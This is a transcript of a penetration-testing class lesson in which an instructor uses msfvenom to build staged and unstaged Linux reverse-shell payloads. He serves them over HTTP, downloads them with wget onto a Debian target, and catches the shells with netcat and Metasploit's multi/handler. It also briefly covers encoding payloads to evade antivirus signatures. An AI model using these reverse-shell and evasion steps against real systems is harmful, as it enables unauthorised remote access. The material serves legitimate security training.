Share that. All right, so we're using MSF Venom to generate a staged payload and an unstaged payload, and we're gonna try and get shells on our Debian machine. Okay, so let's first do what I did before. I'm gonna generate a unstaged payload first. That way you have this on video. All right, so I'm gonna follow my cheat sheet, MSF Venom. I already understand the architecture and the operating system and the type of shell I want to get. Right? I've already done my recon at this step. So -P for payload, Linux. Oops, that was slow. x86, right? Because that's the type we want. And I want I don't want a reverse interpreter. Reverse shell. Let me find the list of this most basic one, which is I'm trying to find the one. I always have a hard time finding this name. There we go. Shell underscore reverse underscore TCP. Okay, so we're using Linux, x86 architecture, shell underscore for unstaged. Sometimes you'll see like, oh God, why is this? What happened here? Give me my terminal back, please. I'll do this trick. Don't know why that works. Where'd it go? Command's gone. MSF Venom -P next x86 / shell underscore reverse underscore TCP. Okay, so that's what we need for that. We need to give it the options. If I do dash list options, if you never remember, you do that. Takes a moment. Right, and again, these are the things you need to set: L host and L port for my local host, right? My local IP address, the listen address, right? I'm listening, and the port set for default 444. So dash L host equals, and ahead of you guys this time. I got it saved there. Dash L host equals that, or L host equals that. L port equals 9001 dash F elf, which we're doing Linux, reverse underscore shell is what I'll call it. We happy with this? Does this look okay? I feel like I'm okay with this. Let's find out. We give it a moment. We're like building our sweet Venom for our specific target. We just need to trick this target into running it, and we'll get a shell. All right, so here's my reverse shell. I'm going to show you another way that we can get this over. Right, before I use SCP, you'll see another way tomorrow, but I'm going to show you. We also know about wget, right? You can use the web to serve things up. So I think you guys have seen this before. If not, you'll see it again tomorrow. Here's my web server. It's running on port 80. It's serving up things there. You can just take a look at it. If I go to localhost, I see it. And I want to go to /rev shell. You see it's working. See my web server got the GET request. Right? Just going to save it there. Okay. So now that I have this running, this like on a web server, right? My payload is being served up. Here's another way I can get it over to my target. I can just wget it, right? HTTP:// my actual IP address. Copy. Should just work because I have it on default 80. And then we want reverse_shell. Cool. Looks like it worked. Can always just check here. Yes, it worked. There's the GET request. I can see it in my logs. Cool. So now we have, what did I call it? Reverse_shell. Reverse_shell. Cool. Make it executable. Make sure we have a listener listening. We said 9,000, right? Pray.
9,001.
Over 9,000. Smart. Okay. Oh, the truth, right? Okay, it's hanging. We kind of expect that. Okay, we have a connection. We like that. And then usually I just go with the who am I. It doesn't help us because we're root on both machines, but you can host name too. Cool. Right. This is what I showed you a little earlier. And this is using a unstaged payload, right? Everything goes all at once. It's a bit simpler. You can use NC to catch it. Okay. Let me show you the staged payload now. We're going to use MSFenum to generate a staged payload. So MSFenum-P. Again, this part doesn't change because we're again still Linux and we're still x86. But now it's the type of payload that we want to generate. So this one is, we're going to use meterpreter / reverse TCP. Notice there's a slash now in between, / for staged. What do we need? We need lhost again, and these will always be the same because we're doing a reverse shell. These are the things you need for them. It's my IP address. Boom. And lport 9002. Let's not forget that. Okay. -f will be elf. And we'll call this staged reverse shell. How do we feel about this? I think that's not too bad, right? Payload, Linux, x86. This part didn't change. This part did. We're going to use meterpreter, reverse TCP. What do we need for a reverse TCP shell? lhost, lport every single time. Cool. Looks good. Let's try it. Cool. So we have that there. Let's again serve it up. I'm going to use Python to serve it up again. Port 80. So it's just whatever /staged_reverse_shell. So let's do that. We go over here. I'm just going to wget it. In fact, I'm going to do that. Staged shell. Looks like we got it. Always can confirm over here. We got the GET request. Cool.
Matt, do you think you could do it side by side?
I can.
Thank you.
Go away. Actually, can I? Well, I can if I do this. The terminal vertically. Okay. So here I'm root at Debian. Here I'm root at Kali. What did I want to do now? I wanted to run this stage reverse shell, but on this side, I need to be listening for it first. And what I had told you is you need to use MSF Metasploit to catch it, to catch a staged payload. I didn't give you explicit directions for that yet, but in one of the links I sent you, there are explicit directions. So I'm going to open that link up and have that also side by side so you can see me following the directions. And copy. This is one of the links I gave you. Was it this one? Is it this one? Is it this one? It's this one. Okay. This one I like because it's very short. It has most of what you're looking for, right? Either a Linux interpreter shell, a Linux bind shell, regular old Linux bind shell, Windows shells, Mac shells, some web ones. But anyway, what I like at the bottom is it tells you how to catch them with Metasploit. Literally just follow these instructions and it should work. Okay. So let's do that. I'm going to follow them at the bottom, use or start Metasploit. So MSF console. How do you start Metasploit? Use MSF console. I think it has the instructions there up here, but if not, also we'll send you the link from the actual folks that make it from Rapid7. Anyway, oh man, my terminal didn't make the ASCII art look all nice, but every time you load up MSF console, you get some nice, sweet, random ASCII art. So a pleasant surprise for you. Anyway, scroll to the bottom, use exploit multi-handler. Okay. So we go to use exploit multi-handler. And this is kind of like the MSF console's Swiss Army knife, right? It's in the name. It's for handling multiple things. Okay. Again, follow these directions. Set payload with the payload that you're going to use to catch, or that you're expecting to catch, right? So set payload, and I'm going to even go right back here to this terminal where I created it, and I'm going to copy and paste it. This was the payload. Linux x86 interpreter reverse underscore TCP. Okay, copy. Set the payload. Cool, the payload's been set. We get a nice little prompt that tells you that. You can show options if you're interested in seeing all of the different options that are available to you. But again, reverse shell, there's only two things we need, lhost, lport. Okay, so let's set them. Set lhost to, I will never remember you. Don't need to remember if you have copy and paste. Okay, set lport 9001, I'll never forget. Show options if you want to take a look again. You see the things that are required already, say yes. Right, those are the two things we need.
Didn't you use 9002 for the second one?
Did I? God.
It is 9002.
All right, well, set port 9002. This is why last cohort I kept 1337 every single time. This cohort I try and change it just because I want to show you can do on any port you want, but then I always forget. That's okay. All right, we got that set. We got all of our options set. We're pretty much happy, right? We set the payload, we set the local IP and ports that we need. All you have to do now is hit run or type run and hit enter. Okay, we got some kind of prompt. It started the handler, right? This is my IP address. This is the port that it's listening on. Now we just need to run staged reverse shell. And you pray. Oh, prayers have been answered. The interpreter was able to, or Metasploit was able to catch that shell that was being sent to us, and you get this nice interpreter prompt. It's a kind of a different kind of shell. You get a few extra features that you don't normally have on the regular shell. If you want to drop down into the regular shell, you just type shell, and you get the regular shell. You could type like, hostname, right, Debian. So if you were getting that error with segmentation fault or something similar sounding to that, most likely it was because you were trying to catch a staged payload using netcat. I bet that's probably what a lot of folks are doing, which is fine. You will make that mistake. I've made it many times. You kind of have to make it a few times until you are more careful. Questions, comments? Are you ready to try this now?
I don't get how you know the name of the payload you're capturing when you're doing this.
It's the same one that I created.
No, I mean in real world.
Oh, how do you know which payload to use?
Like, didn't you made a payload with a name? So I'm trying to capture it. I'm not you. I'm trying to capture your payload. How do I know your payload name?
The payload has a name. I did not set it. So if I go here,
Oh,
right, this right here, Linux x86 interpreter reverse TCP, is a specific named payload. And if you do, what is it?
couldn't I rename it?
I mean, I suppose you could rename it, but this is like, this payload is set up in such a way that like there's two parts, right? Like for having a staged payload, it's like you're going to send a small piece in, and that small piece is going to like get its friends and everything else inside, right? So there's got to be some kind of like communication that is dealing with that. And so we have to make two sides of it. So like the actual payload side that is on the machine, and the side that's going to catch it, that's going to know how to catch it. So you don't want to rename any of these. These are already specifically named and all for specific purposes. They will all be named by, and I shouldn't say all, but big general, operating system, architecture, and then like the kind of shell that it is. So you'll see interpreter. That means you'll catch it with Metasploit. You'll get a interpreter shell. You'll see like shell / reverse _ TCP. That'll be a regular staged shell. There's a whole bunch of different ones. Like I said, this cheat sheet is going to have the majority of them, but there's probably a few days where you might have to look through the man page of MSF console to find, or MSF Venom to find the appropriate payload for your target. Does that answer your question or no?
I mean, I guess my question, I'm maliciously trying to do this to someone.
Mm-hmm.
I have to use a pre-named payload?
I tried renaming it. It gave me an error message.
What do you mean, like renaming this? Because this
what I'm saying is, like, if I'm maliciously trying to do this to someone, why? It's a huge weakness to my attack, right? Like, you can know the name of my attack.
No. So like, how is Debian going to know the name of your attack? Because if I go to this machine right here, the one that's at Debian, all it has is this file called stage reverse shell. Right? All Debian sees, all my target sees is some file called, that I've named stage reverse shell, and all it can do, you could run file on it and you could see it's an ELF, but you don't know what it does. You don't know what payload generated this. This is shellcode at this point. This is like just specific instructions for the shell to send me a shell. This is not something like this name right here. This is not something that our target ever sees. This is like you're going into your toolbox of poisons and specifying this type of poison in this particular vial. That's what we're going to use. Does that make it more or less clear?
I guess I'm still sussing this out.
I think what Matt is saying is that the name is like a label for your convenience. It's something that it's so that like if you had like a spice rack, right? Like, and if it were like coriander, like I don't know, sage, thyme, that's useful for you. But like when you do the thing and you like make a dish or whatever over, like they don't know what it used to be before. It's the label is just for you, for the hacker.
I guess my question is, like, say it's arsenic, right?
Sweet. Okay.
I, on the other side, when I look for arsenic somewhere, like when I just have a constant watch for the word arsenic, and I'm like, oh, there's arsenic. I'm not.
No. I think you bring up a good point, Wexler. You bring up an excellent point, right? If we think of, and I think that's really a good thing to think about things in the physical world like that, right? Why don't we on the blue side just say, hey, this is poison. Let's just be on the lookout for files that look like this. And that is totally a thing, right? That is how a lot of antivirus works. And you'll see there's a whole bunch of different, like, again, we're barely touching MSF Venom. There's a bunch of options you could set. So yes, this is the payload you're going to create, but we can hide that in different ways. We can encode it, 20, 30, 40 times in different schemas so that, unless you're specifically looking for how I encoded it and know how many times I encoded it, you won't be able to find it. So I guess the two parts here is, yes, it's kind of like we're building a kind of a poison recipe where it's like, this is the specific kind of thing it's going to do. And this is specifically how we want to send it. And yes, people on the blue side should be looking out for this type of stuff. For us, for now, we're not going to worry about encoding our payloads and hiding them. We're just going to send them over, and they will work across like pretty much everything on PWK. But you're absolutely thinking in the right direction of like, hey, why don't we just like look for this type of signature if this is what the payload is, right? Does that clear it up?
Yeah, that good. Thank you.
Cool. All right. It's 5:24. I want to give you guys another 20 minutes to try this specifically, right? Try and get yourself, use MSF Venom, generate a interpreter shell, and catch it. Okay. You can bring over the code any way you want. You could bring it over with HTTP like I did here. You could use SCP if you want. I just want you to practice this essentially, right? Setting it up and catching it. And again, what did I do? I'm really good at following directions, guys. Even though I'm okay at following directions, guys. So I just followed what it said here. Okay. Helps you out. All right. Let's break. We'll come back.